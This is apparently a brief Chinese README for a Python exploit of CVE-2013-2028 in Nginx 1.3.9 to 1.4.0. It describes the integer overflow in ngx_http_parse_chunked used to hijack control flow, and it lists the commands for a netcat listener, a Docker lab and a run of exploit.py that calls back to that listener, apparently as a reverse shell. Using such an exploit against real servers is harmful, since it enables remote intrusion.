
CVE-2013-2028 python 漏洞利用
受影响软件:Nginx 1.3.9 < 1.4.0
修复提交:https://github.com/nginx/nginx/commit/4997de8005630664ab35f27140e2077e818b21a7
漏洞存在于函数 ngx_http_parse_chunked 中。该漏洞利用会触发 ngx_http_parse_chunked 中的整数溢出,随后利用该溢出覆盖栈,从而劫持控制流。
实际漏洞利用包含 4 个步骤:
nc -lvp 4345sudo docker-compose up --buildpython2 exploit.py -ra 127.0.0.1 -rp 8081 -la <listener machine address> -lp <listener machine port>